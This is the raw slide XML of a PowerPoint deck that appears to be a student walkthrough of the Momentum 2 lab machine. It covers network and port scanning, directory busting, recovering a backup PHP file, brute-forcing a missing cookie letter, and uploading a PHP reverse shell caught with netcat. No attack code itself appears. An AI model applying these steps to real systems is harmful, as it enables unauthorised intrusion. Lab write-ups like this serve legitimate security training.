              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Dirb -  Dirb is a directory busting tool rapidly running multiple subdirectories to the URL scanning for matches. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Gobuster – Gobuster is a directory busting tool just like Dirb. I found it easier to read and a bit more user friendly overall, but I found more results by using them together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Nano/Sudo Nano – Nano is my preferred text editor you will occasionally have to use sudo nano to edit files with root privileges. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F378C457-806F-8BF2-8920-3816E97E9490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2592324" y="0"/>
            <a:ext cx="7159752" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Tools used for Momentum 2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3790867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8F9D1A-653B-2E63-C34E-C2A027ACDEFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384048" y="590324"/>
            <a:ext cx="11576304"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utura"/>
              </a:rPr>
              <a:t> Python3 – Python3 is a programming language used for creating programs, applications and in the cybersecurity field creating tools that can serve multiple purposes in our line of work to improve our quality of life. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Windows – Windows is the basic operating system outside of my virtual box I used to do most of my research on this project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> is a network utility tool used for the exchange of data over a network which was useful in this project for delivering a reverse shell payload in this project.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="460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program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C566C6-E4F5-02AA-AFA0-E8143E30F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354" y="79800"/>
            <a:ext cx="3689161" cy="2064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 screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{131AC9A3-013D-86B8-660C-51E9CC6F5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946" y="79800"/>
            <a:ext cx="4465200" cy="2064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A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5731B9BB-81E3-DAB4-D67F-2F8420553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946" y="2476804"/>
            <a:ext cx="4465200" cy="3433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8E87DE4B-1E1E-A158-3072-4D476F622FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318254" y="2604823"/>
            <a:ext cx="6883824" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>First thing you'll do in this machine is run the command sudo netdiscover with the –r for a range scan and using 10.0.2.0/24 to scan from the base of the network. After discovering IP 10.0.2.251 I ran a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> scan enumerating with –T5 –A and –p-, -T5 being the most aggressive and fastest scan option, -A for OS detection, version detection, script scanning and traceroute allowing my scan to be as thorough as possible. I then used –p- to run a scan for all 65535 ports. The scan came back with open ports 80 http running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> indicating there was a webserver up to investigate, along with port 22 SSH for a password protected secure shell login.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="300600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B10BDA9-96CF-15F1-EAEC-DA5629D21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35" y="179149"/>
            <a:ext cx="3714553" cy="27714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screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C23CE7CA-FCCC-2238-23BD-9FA752EC4E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="329" t="2223" r="329" b="2223"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051249" y="179150"/>
            <a:ext cx="5066415" cy="6362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8C07A8CE-B610-B2E4-7769-B1E4131DF0E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226735" y="3168747"/>
            <a:ext cx="6701966" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Upon further investigation we find the webserver from our earlier scan, finding no other hints on this webserver I then proceeded with using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> and gobuster and used wordlist /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/directory-list-2.3-medium.txt to run a basic scan for hidden subdirectories finding two notable directories /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> and /owls. I then ran another scan through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> using /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/extensions_common.txt and found two more notable subdirectories /dashboard.html and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>ajax.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Futura"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2610356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B296B0C-79DC-0648-15F5-3387AA745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1" y="270952"/>
            <a:ext cx="5989207" cy="3158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descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68D64C51-1B04-4C61-CAC7-F63E1A747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93" y="270953"/>
            <a:ext cx="5661854" cy="3158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3351549C-47E8-A859-64E5-DB4DD6544B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493198" y="4402317"/>
            <a:ext cx="8703297" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>After looking further into /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> we find an index with a file main.js to look into later. I played around a bit in gobuster and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> and eventually came across a wordlist combination that worked with the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>ajax.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> and came up with /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>ajax.php.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> a backup with information on the main /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>ajax.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> file </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8016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Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ABF710C-9106-A87B-EB67-2E903C272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701" y="250002"/>
            <a:ext cx="5273050" cy="6121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computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4339FDBB-42EB-09DE-0013-E339EFB3F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49" y="250002"/>
            <a:ext cx="6113856" cy="2725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5F9374AD-6D8E-FA9F-9BB1-8FF366ECBE75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212649" y="3242820"/>
            <a:ext cx="6391373" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>After a searching awhile on the internet I found that I could download the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> file with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> before examining the components of the file I went back to the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> directory and took a look at the main.js directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>We can see that the function of this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>uploadfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> and reading further we see an if statement indicating that if the response is equal to one then it will successfully complete the upload so now, we need find out how we can make a file that we can upload and make it give the server a response of one.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1596011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AC983EF-4C86-1D72-2107-00ECE7E23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538" y="419068"/>
            <a:ext cx="5183390" cy="3009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computer screen shot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95A8330A-92FC-4A7F-8520-73025F102A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72" y="419068"/>
            <a:ext cx="5772450" cy="3009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ACC363B6-1D17-9B39-3353-2895B75E512F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246472" y="4361986"/>
            <a:ext cx="11851456" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Here we have run the cat command on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>ajax.php.bak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> file and now that we have it on our system, we can see its contents. We can see in the commented-out line that we can use this cookie for admin privileges to possibly create a payload using script but the cookie is incomplete in the comment we can see it is missing a letter and we have a helpful hint that the missing letter needs to be uppercase if all this is done correctly, we will get a return of the one response we need to successfully upload a payload to the server. On the left I have already begun to prepare a payload of a reverse shell the one I used in my version of kali is found at /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>webshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>-reverse-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t> but to make this easier on myself I used the command locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3701685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CD2C8CB-E6BD-F1FD-37C2-43D3DD120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9724" y="161601"/>
            <a:ext cx="2876951" cy="27531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FF062780-B695-E955-941E-D3CB66495423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154305" y="4075002"/>
            <a:ext cx="12009120" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Futura"/>
              </a:rPr>
              <a:t>Continuing to the construction of the payload knowing now that we need to find a way to not only deliver the payload, but we also need to write a way to add an uppercase letter at the end of the admin cookie to get the response we need to successfully upload our reverse shell to the server. To achieve the addition of the uppercase letter at the end of the cookie we can create a text file to implement into the script. On the right we have the way the text file should look in order to function with our script you can either create this in nano or find a download on a online repository but this file is simple enough to create by writing every letter in the alphabet A-Z each letter on an individual line we and the single quote at the end because if you look in the script the string is incomplete until we add the variable ‘word’ which will add the uppercase letter and the single quote we need to enclose the string. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25DEEB48-A563-8505-C686-C63ACE3A8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 y="161601"/>
            <a:ext cx="6506366" cy="366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27736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660</TotalTime>
  <Words>1765</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>35</Paragraphs>
  <Slides>14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Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Futura</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Office Theme</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Logan Davenport</dc:creator>
  <cp:lastModifiedBy>Logan Davenport</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-09T10:42:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-14T18:24:05Z</dcterms:modified>
</cp:coreProperties>
</file>